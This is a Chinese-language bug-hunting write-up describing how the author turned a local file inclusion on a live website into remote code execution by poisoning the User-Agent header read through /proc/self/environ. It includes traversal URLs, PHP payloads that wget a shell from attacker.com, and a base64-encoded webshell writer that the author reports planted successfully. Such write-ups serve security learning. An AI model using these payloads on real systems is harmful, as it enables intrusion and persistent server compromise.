挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权

admin
admin
admin
102157
文章
87
评论
2021年4月10日18:00:50评论65 views字数 2057阅读6分51秒阅读模式

挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权本文分享的Writeup是作者近期针对某20000+用户网站,通过对请求User-Agent内容构造,成功实现从本地文件包含漏洞(LFI)到远程代码执行漏洞(RCE)的提权。

发现LFI漏洞

以下为目标网站的Contact Us链接路径:

https://www.website.com/index.php?pg=contact.php

挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权

经过对pg参数的fuzz,我发现其中存在LFI漏洞,可以用../../../../etc/passwd直接读出系统密码信息:

https://www.website.com/index.php?pg=../../../../etc/passwd

挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权

从LFI到RCE

要想把LFI提权到RCE, 我又发现另一个可读路径/proc/self/environ,于是我有了以下构造:

https://www.website.com/index.php?pg=../../../../proc/self/environ

挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权
很好,从其输出中可以看到,其中包含了如HTTP_USER_AGENT等一些环境变量参数:

挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权不错,开启BurpSuite,用system()方法更改请求中的User-Agent值:

User-Agent: <?system(‘wget http://attacker.com/shell.txt -O shell.php’);?>

不行,无效。再试试exec()方法:

User-Agent: <?exec(‘wget http://attacker.com/shell.txt -O shell.php’);?>

也是不行,无效。那用phpinit()试试:

User-Agent: <?php phpinfo(); ?>

折腾了一阵后,我差点忘了我是可以向目标网站服务器写东西的啊,于是我就又在User-Agent头中构造了以下Payload:

User-Agent: <?php $a = base64_decode('PD9waHAgCiAgJGEgPSAkX1BPU1RbJ2NvZGUnXTsKICAkZmlsZSA9IEBmb3BlbigkX1BPU1RbJ2ZpbGUnXSwndycpOwogIEBmd3JpdGUoJGZpbGUsJGEpOwogIEBmY2xvc2UoJGZpbGUpOwo/Pgo8Y2VudGVyPgogIDxmb3JtIG1ldGhvZD0icG9zdCIgaWQ9ImZvcm0iPgogICAgPGgyPkZpbGUgV3JpdGVyPC9oMj4KICAgIEZpbGUgTmFtZTxicj48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZSIgcGxhY2Vob2xkZXI9InNoZWxsLnBocCI+PGJyPgogICAgU2hlbGwgQ29kZTxicj48dGV4dGFyZWEgbmFtZT0iY29kZSIgZm 9ybT0iZm 9ybSIgcGxhY2Vob2xkZXI9IlBhc3RlIHlvdXIgc2hlbGwgaGVyZSI+PC90ZXh0YXJlYT48YnI+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iV3JpdGUiPgogIDwvZm 9ybT4KPC9jZW50ZXI+Cg=='); $file = fopen('nadeshot.php','w'); echo fwrite($file,$a); fclose($file); ?>




解释上述构造的Payload


上述构造使用的最终Payload是一个base64编码的webshell,原代码文件存在于Github库中-https://github.com/alita-ido/PHP-File-Writer/blob/master/lfi-writer.php,其大概造型为:




$a = base64_decode(‘webshell_base64_encoded_code_here’);




然后我们向服务器中写入了一个名为nadeshot.php的文件:




$file = fopen(‘nadeshot.php’,’w’);




然后服务器会把base64编码的上述文件写入nadeshot.php文件:




echo fwrite($file,$a);




再保存文件:




fclose($file);




上述请求Payload执行后的BurpSuite动作如下:
挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权



响应成功。希望我们的Webshell可以成功,访问https://website.com/nadeshot.php试试看:


挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权Webshell写入成功,保存为了nadeshot.php,太好了,我们再接着往里写入nadeshot.txt文件试试:



挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权



然后访问https://website.com/nadeshot.txt,一样有效:


挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权就这样,成功实现了从LFI到RCE的提权。



参考来源:medium








挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权























精彩推荐




























挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权



挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权

















挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权



挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权









本文始发于微信公众号(FreeBuf):挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月10日18:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   挖洞经验 | 构造User-Agent请求头内容实现LFI到RCE提权https://cn-sec.com/archives/188766.html

发表评论

匿名网友 填写信息